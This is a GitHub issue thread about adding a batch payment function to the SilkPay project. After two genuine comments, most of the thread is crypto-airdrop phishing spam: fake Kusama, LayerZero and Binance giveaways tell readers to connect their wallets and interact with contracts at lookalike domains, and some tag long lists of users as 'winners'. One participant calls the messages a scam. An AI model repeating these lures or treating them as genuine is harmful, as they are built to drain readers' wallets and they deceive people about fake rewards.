### ISSUE TITLE
add logic to support batch payment

### ISSUE THREAD

**Issue by lilyanB** [TecSong/SilkPay#6]

**Comment by TecSong** [comment]
now "createPayment" function just can create one payment for payer. Considering the scenario where the payer needs to create multiple payments at the same time, we need a function for batch creation

**Comment by lilyanB** [comment]
Okay, that's clearer. Thank you. So, for example, a person wants to create three payments. He has to call the "createPayment" function three times. We want him to call a "batchCreatePayment" function instead, where he specifies the three payments directly.
I'll take care of that.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by ghost** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Muadib2022, @EridianAlpha, @ramyrabi3, @ZhenZhang-Git, @syedrawoof, @balaganesh102004, @jedimindtricks0606, @rony2818, @MiyanoX, @Parallax18, @sfinx13, @CryptoEve, @p4r4no1ak, @LeoxCrane, @CuiMonica, @symaticvisuals, @ApexCyberPunk, @Nikos-Salichos, @musprodev, @Eeelijahhh, @hriddhi, @fanghaotao, @stevyhacker, @XMVZ, @parisote, @jmgrd98, @vijoin, @vasukushwah, @ilovejs, @RenanSouzaRodrigues, @rfks, @Lovegupta112, @StoicInsight, @ParthVarde, @Harshh18, @chuanyue98, @rakibul-dev, @Matty1515, @songbojin, @theshying, @saiudja, @Minsc7, @iamfiscus, @yuyzhen, @MrQuanZ, @JacksonGao188, @adam-wd, @garrrikkotua, @Dakshin008, @qiqine

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Narcissus888, @javenleee, @iseekTo, @north459, @thedownup, @h9tyf, @White-or-Black9, @edward821220, @hzqandy123, @C91F37, @anylots, @crkmythical, @Durantdzr, @naozhong015, @Louis-XWB, @Winofoever, @yang24201, @magic8ytes, @0xBigotry, @xiaotao0212, @showlizi, @15082120384, @ironGYII, @dz951014619, @SoleilQ, @Hzao, @renjunming3, @ericssonxiao, @remo-thanks, @brucephaner, @FreeDreamer-Crypto, @wallebach, @xiajinchun, @asyuan, @BuckWang0509, @shangdinvxu, @philarist-alt, @Eurusyoung1991, @saullfeng, @zchdu, @Danielhong9861, @suyanhanx, @w5pand, @wsw2000, @newlife, @xi998, @anglee0323, @ayirobots, @ykky0, @noowxela

**Comment by Eurusyoung1991** [comment]
好的，谢谢你的来信。我已经收到你的来信

**Comment by Durantdzr** [comment]
已收到你的信件，我会尽快处理。

**Comment by bluepadu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by Shanni** [comment]
这个总给我们发scam信息… 有点无语
